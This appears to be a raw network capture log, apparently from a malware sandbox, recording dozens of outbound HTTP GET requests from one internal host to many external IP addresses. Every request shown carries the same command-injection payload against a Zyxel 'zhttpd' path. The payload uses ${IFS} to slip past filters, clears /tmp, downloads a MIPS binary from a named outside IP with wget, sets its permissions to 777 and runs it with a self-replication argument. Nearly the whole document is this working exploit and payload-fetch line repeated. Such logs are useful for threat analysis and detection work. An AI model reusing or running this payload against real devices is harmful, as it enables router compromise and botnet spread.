                                            Jan 14, 2024 15:50:36.353287935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3324192.168.2.2351660160.36.16.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353293896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3325192.168.2.2356130187.108.59.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353338957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3326192.168.2.234591641.222.168.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353375912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3327192.168.2.235430641.117.20.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353401899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3328192.168.2.235762276.62.16.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353427887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3329192.168.2.2341442126.246.211.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353461027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3330192.168.2.2343040157.22.140.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353477001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3331192.168.2.235900677.51.242.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353497982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3332192.168.2.234608268.108.236.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353543997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3333192.168.2.2352656156.32.24.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353557110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3334192.168.2.2352514160.43.145.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353607893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3335192.168.2.234331827.107.26.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353629112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3336192.168.2.2350050156.161.187.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353631973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3337192.168.2.235021036.133.200.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353653908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3338192.168.2.233477445.244.119.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353662014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3339192.168.2.23470788.183.87.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353737116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3340192.168.2.2338426101.128.169.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353738070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3341192.168.2.233278852.188.242.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353755951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3342192.168.2.2341928158.162.185.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353771925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3343192.168.2.2338970147.146.170.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353842020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3344192.168.2.2351406207.70.205.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353857040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3345192.168.2.2335864144.99.89.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353895903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3346192.168.2.2336580160.21.159.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353921890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3347192.168.2.2356630166.157.51.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353965044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3348192.168.2.23583609.112.26.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.353992939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3349192.168.2.235010890.38.99.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354001045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3350192.168.2.234011244.9.102.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354037046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3351192.168.2.23332261.238.46.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354098082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3352192.168.2.2354722126.42.21.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354120016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3353192.168.2.2348620117.24.102.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354152918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3354192.168.2.234392689.200.247.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354176998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3355192.168.2.2343778175.2.46.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354192972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3356192.168.2.235124081.35.96.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354224920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3357192.168.2.234107890.177.101.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354259014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3358192.168.2.2359454186.63.190.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354283094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3359192.168.2.2350112177.76.115.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354331970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3360192.168.2.2342400210.118.215.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354358912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3361192.168.2.2350868134.176.234.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354382038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3362192.168.2.235496668.54.74.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354420900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3363192.168.2.233651276.27.91.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354458094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3364192.168.2.2335282103.165.223.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354487896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3365192.168.2.2356760178.89.190.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354526997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3366192.168.2.2342502216.163.2.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354552031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3367192.168.2.2341810195.105.234.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354585886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3368192.168.2.2354756100.137.147.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354593039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3369192.168.2.234996817.67.224.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354614973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3370192.168.2.2339814197.52.246.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354686022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3371192.168.2.233475676.209.81.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354707956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3372192.168.2.233461834.205.42.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354733944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3373192.168.2.235619287.227.83.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354769945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3374192.168.2.235163278.240.126.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354796886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3375192.168.2.235002671.52.220.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354840040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3376192.168.2.234785212.55.82.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354861021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3377192.168.2.234147423.32.84.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354913950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3378192.168.2.2340350124.46.107.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354928970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3379192.168.2.233665041.78.112.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354974985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3380192.168.2.23346648.111.93.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.354998112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3381192.168.2.234757652.64.87.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355012894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3382192.168.2.2344634157.107.124.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355020046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3383192.168.2.235184083.122.253.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355093002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3384192.168.2.23602928.13.11.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355135918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3385192.168.2.2350590221.148.196.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.355164051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3386192.168.2.233710261.91.190.31443
                                            TimestampBytes transferredDirectionData
